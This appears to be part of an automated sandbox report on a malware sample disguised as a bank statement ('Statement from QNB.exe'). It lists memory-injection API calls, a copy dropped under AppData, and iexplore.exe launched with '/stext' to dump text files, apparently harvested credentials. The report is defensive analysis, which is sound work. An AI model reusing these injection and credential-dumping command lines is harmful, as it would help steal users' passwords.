                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00572A7B23_2_00572A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00569E1023_2_00569E10
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00563E0523_2_00563E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_005610DE23_2_005610DE
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_005730BF23_2_005730BF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00574D6523_2_00574D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056A56123_2_0056A561
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056A1E823_2_0056A1E8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056E1B923_2_0056E1B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9B9C825_3_00A9B9C8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9B9C825_3_00A9B9C8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9B9C825_3_00A9B9C8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9B9C825_3_00A9B9C8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056DA6625_2_0056DA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0057697A25_2_0057697A
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056437925_2_00564379
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056D38225_2_0056D382
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00572A7B25_2_00572A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00569E1025_2_00569E10
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00563E0525_2_00563E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_005610DE25_2_005610DE
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_005730BF25_2_005730BF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00574D6525_2_00574D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056A56125_2_0056A561
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056A1E825_2_0056A1E8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056E1B925_2_0056E1B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056DA6626_2_0056DA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0057697A26_2_0057697A
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056437926_2_00564379
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056D38226_2_0056D382
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00572A7B26_2_00572A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00569E1026_2_00569E10
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00563E0526_2_00563E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_005610DE26_2_005610DE
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_005730BF26_2_005730BF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00574D6526_2_00574D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056A56126_2_0056A561
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056A1E826_2_0056A1E8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056E1B926_2_0056E1B9
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 004146FD appears 35 times
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00443360 appears 37 times
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00411538 appears 35 times
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00442E56 appears 32 times
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00414AA6 appears 88 times
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 0041485E appears 67 times
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_02306439 NtProtectVirtualMemory,0_2_02306439
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022F3E05 NtWriteVirtualMemory,TerminateProcess,0_2_022F3E05
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FDA66 NtAllocateVirtualMemory,LoadLibraryA,0_2_022FDA66
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_0230697A NtResumeThread,0_2_0230697A
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_02302A7B NtWriteVirtualMemory,0_2_02302A7B
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_02304D65 NtWriteVirtualMemory,0_2_02304D65
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087A177 NtAllocateVirtualMemory,4_3_0087A177
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087A177 NtAllocateVirtualMemory,4_3_0087A177
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087A177 NtAllocateVirtualMemory,4_3_0087A177
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087A177 NtAllocateVirtualMemory,4_3_0087A177
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF6439 NtProtectVirtualMemory,15_2_02BF6439
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BE3E05 NtWriteVirtualMemory,TerminateProcess,15_2_02BE3E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BEDA66 NtAllocateVirtualMemory,LoadLibraryA,15_2_02BEDA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF697A NtUnmapViewOfSection,15_2_02BF697A
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF2A7B NtWriteVirtualMemory,15_2_02BF2A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BF4D65 NtWriteVirtualMemory,15_2_02BF4D65
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,17_2_00408B60
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 18_2_0040172C NtdllDefWindowProc_A,18_2_0040172C
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 18_2_004017FE NtdllDefWindowProc_A,18_2_004017FE
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006BDA66 NtAllocateVirtualMemory,LoadLibraryA,21_2_006BDA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C6439 NtProtectVirtualMemory,21_2_006C6439
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006B3E05 NtWriteVirtualMemory,TerminateProcess,21_2_006B3E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C2A7B NtWriteVirtualMemory,21_2_006C2A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006C4D65 NtWriteVirtualMemory,21_2_006C4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CEDA66 NtAllocateVirtualMemory,LoadLibraryA,22_2_02CEDA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CE3E05 NtWriteVirtualMemory,TerminateProcess,22_2_02CE3E05
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF6439 NtProtectVirtualMemory,22_2_02CF6439
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF2A7B NtWriteVirtualMemory,22_2_02CF2A7B
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF4D65 NtWriteVirtualMemory,22_2_02CF4D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA,23_2_0056DA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00576439 NtProtectVirtualMemory,23_2_00576439
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00564379 NtProtectVirtualMemory,23_2_00564379
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_005643DF NtProtectVirtualMemory,23_2_005643DF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA,25_2_0056DA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00576439 NtProtectVirtualMemory,25_2_00576439
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00564379 NtProtectVirtualMemory,25_2_00564379
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_005643DF NtProtectVirtualMemory,25_2_005643DF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA,26_2_0056DA66
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00576439 NtProtectVirtualMemory,26_2_00576439
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00564379 NtProtectVirtualMemory,26_2_00564379
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_005643DF NtProtectVirtualMemory,26_2_005643DF
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess Stats: CPU usage > 98%
                    Source: Statement from QNB.exe, 00000000.00000000.80618851300.0000000000421000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
                    Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename1.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX vs Statement from QNB.exe
                    Source: Statement from QNB.exe, 00000004.00000000.80785394197.0000000000421000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
                    Source: Statement from QNB.exeBinary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
                    Source: C:\Users\user\Desktop\Statement from QNB.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: edgegdi.dllJump to behavior
                    Source: Statement from QNB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Statement from QNB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe"
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe"
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exe
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt"
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt"
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt"
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
